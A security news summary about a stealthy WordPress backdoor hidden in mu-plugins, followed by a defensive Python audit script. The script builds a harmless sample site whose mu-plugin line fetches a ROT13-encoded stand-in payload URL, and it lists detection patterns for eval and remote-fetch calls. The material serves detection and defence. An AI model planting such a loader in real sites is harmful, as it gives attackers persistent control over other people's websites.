Cybersecurity researchers have identified a new stealthy backdoor hidden within WordPress mu-plugins, allowing threat actors persistent access and remote control. This malware manipulates plugin files, creates malicious admin accounts, and can execute arbitrary PHP code, posing significant risks to affected sites.
Key points
- The backdoor is concealed in the "wp-content/mu-plugins" directory, avoiding detection in normal plugin lists.
- The PHP script "wp-index.php" acts as a loader to fetch and execute a remote payload using ROT13 obfuscation.
- Threat actors can inject files, create admin users, and activate malicious plugins like "wp-bot-protect.php".
- The malware can reset administrator passwords and reinstate itself after removal, maintaining persistence.
- Mitigation strategies include updating WordPress components, enabling two-factor authentication, and conducting regular security audits.
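As a starting point for the security audits mentioned above, here is an added example (not code from the researchers or the linked article) that checks a WordPress tree for the file names listed in the key points and decodes any ROT13 string literals so a reviewer can see what they hide. The function-name patterns, the `audit` and `build_constructed_site` helpers, and the sample site are assumptions made for illustration.

```python
import codecs
import re
import tempfile
from pathlib import Path

# File names reported on this page; everything else here is an assumed heuristic.
REPORTED_NAMES = {"wp-index.php", "wp-bot-protect.php"}
ROT13_CALL = re.compile(r"str_rot13\(\s*(['\"])(.*?)\1\s*\)", re.S)
# Assumed indicators of "fetch and execute": real PHP/WordPress function names.
FETCH_EXEC = re.compile(r"\b(eval|curl_exec|file_get_contents|wp_remote_get)\s*\(")


def audit(wp_root):
    """Return a list of (relative path, reason) findings for one WordPress root."""
    root = Path(wp_root)
    findings = []
    for sub in ("wp-content/mu-plugins", "wp-content/plugins"):
        if not (root / sub).is_dir():
            continue
        for path in sorted((root / sub).rglob("*.php")):
            rel = path.relative_to(root).as_posix()
            text = path.read_text(errors="replace")
            if path.name in REPORTED_NAMES:
                findings.append((rel, "file name reported for this backdoor"))
            for match in ROT13_CALL.finditer(text):
                decoded = codecs.decode(match.group(2), "rot13")
                findings.append((rel, "ROT13 literal decodes to: " + decoded))
            if sub.endswith("mu-plugins") and FETCH_EXEC.search(text):
                findings.append((rel, "mu-plugin fetches or evaluates code"))
    return findings


def build_constructed_site(root):
    """Create a constructed (harmless) sample tree to run the audit against."""
    mu = Path(root) / "wp-content/mu-plugins"
    plugins = Path(root) / "wp-content/plugins/hello"
    mu.mkdir(parents=True)
    plugins.mkdir(parents=True)
    hidden = codecs.encode("https://example.invalid/payload", "rot13")
    (mu / "wp-index.php").write_text(
        "<?php $u = str_rot13('%s'); $c = file_get_contents($u); ?>" % hidden)
    (plugins / "hello.php").write_text("<?php /* benign plugin */ ?>")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_constructed_site(tmp)
        for rel, reason in audit(tmp):
            print(rel, "->", reason)
```

Legitimate must-use plugins can also make HTTP requests, so treat the third finding type as a prompt for manual review rather than proof of compromise.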
Read More: https://thehackernews.com/2025/07/hackers-deploy-stealth-backdoor-in.html